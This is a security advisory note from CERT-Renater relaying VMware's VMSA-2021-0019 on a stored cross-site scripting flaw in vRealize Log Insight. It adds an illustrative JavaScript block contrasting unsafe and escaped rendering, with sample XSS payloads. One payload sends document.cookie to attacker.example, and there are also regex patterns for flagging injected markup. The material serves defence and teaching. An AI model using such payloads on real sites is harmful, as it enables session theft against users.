
=====================================================================

                             CERT-Renater

                 Note d'Information No. 2021/VULN425
_____________________________________________________________________

DATE                : 26/08/2021

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running VMware vRealize Log Insight (vRLI)
                   8.x versions prior to 8.4 and vRLI 4.x, and VMware
                   Cloud Foundation 4.x versions prior to 4.3.

=====================================================================
https://www.vmware.com/security/advisories/VMSA-2021-0019.html
_____________________________________________________________________


Moderate


Advisory ID:       VMSA-2021-0019
CVSSv3 Range:      6.5
Issue Date:        2021-08-24
Updated On:        2021-08-24 (Initial Advisory)
CVE(s):            CVE-2021-22021

Synopsis:
VMware vRealize Log Insight updates address Cross Site Scripting (XSS)
vulnerability (CVE-2021-22021)


1. Impacted Products

    VMware vRealize Log Insight
    VMware Cloud Foundation


2. Introduction

A cross-site scripting vulnerability in VMware vRealize Log Insight was
privately reported to VMware. Updates are available to remediate this
vulnerability in affected VMware products.

3. VMware vRealize Log Insight updates address a Cross Site Scripting
(XSS) vulnerability (CVE-2021-22021)

Description

VMware vRealize Log Insight contains a Cross Site Scripting (XSS)
vulnerability due to improper user input validation. VMware has
evaluated the severity of this issue to be in the Moderate severity
range with a maximum CVSSv3 base score of 6.5.

Known Attack Vectors

An attacker with user privileges may be able to inject a malicious
payload via the Log Insight UI; the payload is executed in the victim's
browser when the victim opens the shared dashboard link. This matches
the CVSSv3 vector in section 4 (PR:L, UI:R, S:C): a low-privileged
account is required, the victim must interact, and the impact crosses
from the application into the victim's browser session.
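The pattern behind this class of defect, as an added illustration that is not VMware's code and not taken from the advisory: a user-controlled dashboard field concatenated straight into markup, beside the output-encoded form, plus a heuristic audit of already-stored values for sites that patch late (the advisory lists no workaround). The field name ("dashboard title"), the rendering code, the sample payloads and the audit regexes are assumptions made for the example; the advisory only states that a payload injected via the UI runs when a victim opens a shared dashboard link.

```javascript
// Added example, not VMware code: stored-XSS pattern on a hypothetical
// "dashboard title" field, vulnerable rendering beside the hardened form.
// Everything below (field, payloads, heuristics) is constructed for illustration.

// Constructed sample of stored titles: one benign, one carrying a script
// injection, one breaking out of a double-quoted attribute context.
const SAMPLE_TITLES = [
  'Prod web tier - 5xx rate',
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  '" autofocus onfocus="alert(document.domain)',
];

// Vulnerable pattern: raw concatenation into both an attribute and a text node.
// "Improper user input validation" in the advisory's wording; the real defect
// is missing contextual output encoding at the point of rendering.
function renderTitleVulnerable(title) {
  return `<h2 class="dashboard-title" title="${title}">${title}</h2>`;
}

// Hardened pattern: encode the five characters that can terminate an HTML
// text node or a quoted attribute value. Applied at render time, so stored
// data is left untouched and cannot be "validated around".
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderTitleSafe(title) {
  const t = escapeHtml(title);
  return `<h2 class="dashboard-title" title="${t}">${t}</h2>`;
}

// Triage aid for content saved before the patch was applied: flags markup,
// inline event handlers and javascript: URLs. A heuristic for review, not a
// substitute for output encoding (assumed patterns, easily bypassed).
const SUSPICIOUS = [/<\s*\/?\s*[a-z]/i, /\bon[a-z]+\s*=/i, /javascript\s*:/i];

function findSuspiciousTitles(titles) {
  return titles.filter((t) => SUSPICIOUS.some((re) => re.test(t)));
}

// Number of <script ...> openings in a rendered string; lets the difference
// between the two renderers be observed without a browser.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

for (const t of SAMPLE_TITLES) {
  console.log(
    'vulnerable:', countScriptTags(renderTitleVulnerable(t)),
    'safe:', countScriptTags(renderTitleSafe(t)),
  );
}
console.log('needs review:', findSuspiciousTitles(SAMPLE_TITLES));
```

The second sample is the textbook case; the third shows why encoding `"` matters even when `<` and `>` are handled: without it the attribute closes early and an `onfocus` handler is injected with no angle brackets at all.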

Resolution

To remediate CVE-2021-22021 apply the patches listed in the 'Fixed
Version' column of the 'Response Matrix' found below.

Workarounds

None.

Additional Documentation

None.

Notes
None.


Acknowledgements

VMware would like to thank Marcin Kot of Prevenity and Tran Viet Quang
of Vantage Point Security for independently reporting this vulnerability
to us.

Response Matrix

Product                      Version                    Running On         CVE Identifier  CVSSv3  Severity  Fixed Version  Workarounds  Additional Documentation
VMware vRealize Log Insight  8.4                        Virtual Appliance  N/A             N/A     N/A       Unaffected     N/A          N/A
VMware vRealize Log Insight  8.3                        Virtual Appliance  CVE-2021-22021  6.5     Moderate  KB85414        None         None
VMware vRealize Log Insight  8.2                        Virtual Appliance  CVE-2021-22021  6.5     Moderate  KB85412        None         None
VMware vRealize Log Insight  8.1.1, 8.1.0, 8.0.0, 4.x   Virtual Appliance  CVE-2021-22021  6.5     Moderate  KB85405        None         None


Impacted Product Suites that Deploy Response Matrix Components

Product                         Version  Running On         CVE Identifier  CVSSv3  Severity  Fixed Version  Workarounds  Additional Documentation
VMware Cloud Foundation (vRLI)  4.x      Virtual Appliance  CVE-2021-22021  6.5     Moderate  4.3            None         None


4. References


Fixed Version(s) and Release Notes:


VMware vRealize Log Insight 8.4.0

Downloads and Documentation:

https://my.vmware.com/en/web/vmware/downloads/details?downloadGroup=VRLI-840&productId=1141&rPId=68060

https://docs.vmware.com/en/vRealize-Log-Insight/8.4/rn/vRealize-Log-Insight-84.html


VMware vRealize Log Insight

8.3: https://kb.vmware.com/s/article/85414
8.2: https://kb.vmware.com/s/article/85412
8.1.1: https://kb.vmware.com/s/article/85405


VMware Cloud Foundation 4.3

Downloads and Documentation:
https://docs.vmware.com/en/VMware-Cloud-Foundation/4.3/rn/VMware-Cloud-Foundation-43-Release-Notes.html


Mitre CVE Dictionary Links:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22021


FIRST CVSSv3 Calculator:
CVE-2021-22021:
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L


5. Change Log

2021-08-24 VMSA-2021-0019
Initial security advisory.


6. Contact

E-mail list for product security notifications and announcements:
https://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce


This Security Advisory is posted to the following lists:

security-announce@lists.vmware.com
bugtraq@securityfocus.com
fulldisclosure@seclists.org


E-mail: security@vmware.com

PGP key at:
https://kb.vmware.com/kb/1055


VMware Security Advisories
https://www.vmware.com/security/advisories


VMware Security Response Policy
https://www.vmware.com/support/policies/security_response.html


VMware Lifecycle Support Phases
https://www.vmware.com/support/policies/lifecycle.html


VMware Security & Compliance Blog
https://blogs.vmware.com/security


Twitter
https://twitter.com/VMwareSRC



Copyright 2021 VMware Inc. All rights reserved.


=========================================================
+ CERT-RENATER       |    tel : 01-53-94-20-44          +
+ 23/25 Rue Daviel   |    fax : 01-53-94-20-41          +
+ 75013 Paris        |    email:cert@support.renater.fr +
=========================================================


